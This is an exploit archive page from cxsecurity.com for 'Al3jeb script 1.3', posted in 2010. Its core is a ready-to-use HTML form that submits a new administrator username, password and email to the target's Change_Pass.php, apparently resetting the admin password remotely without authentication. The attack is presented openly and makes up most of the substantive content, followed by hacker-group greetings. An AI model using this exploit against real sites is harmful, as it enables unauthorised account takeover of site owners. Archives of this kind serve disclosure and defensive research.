Bug: Al3jeb version 1.3 remote change password ( Ascii Version )

Search:
WLB2

Al3jeb version 1.3 remote change password

Published
Credit
Risk
2010.01.21
alnjm33
High
CWE
CVE
Local
Remote
N/A
N/A ( Add )
No
Yes


Exploit Title :al3jeb script Remote Change Password Exploit
Author: alnjm33
Software Link: http://www.traidnt.net/vb/attachment.php?attachmentid=354606&d=1237376300
Version: 1.3
Tested on:1.3
MY home : Sec-war.com
:::::::::::::::exploit:::::::::::::::::::::
<html>
<head>
<title> al3jeb script Remote Change Password Exploit </title>
</head>
<body text="#00FF00" bgcolor="#000000">
<form action=http://SITE/al3jeb/Change_Pass.php method=post style="text-align: center">
<b>For More </b>
<p><b>visit us</b></p>
<p>
<a href="http://sec-war.com/cc/index.php" style="text-decoration: none; font-weight: 700">
http://sec-war.com/cc/index.php</a></p>
<p>
<br>
User: <input name="adminn" type="text" id="adminn" value="" />
<br>
Pass: <input name="adminp" type="password" id="adminp" value="" />
<br>
Email <input name="mail" type="text" id="adminm" value="" />
<br>
<input type="submit" name="Submit" value="Sec-War" /><br>
 <br>
</p>
</form>
</body>
<html>
:::::::::::::::::::::::::::::::
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso -JaMbA-RoOt_EgY-jago-dz-XR57 all sec-war.com members
:::::::::::::::::::::::::::::

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version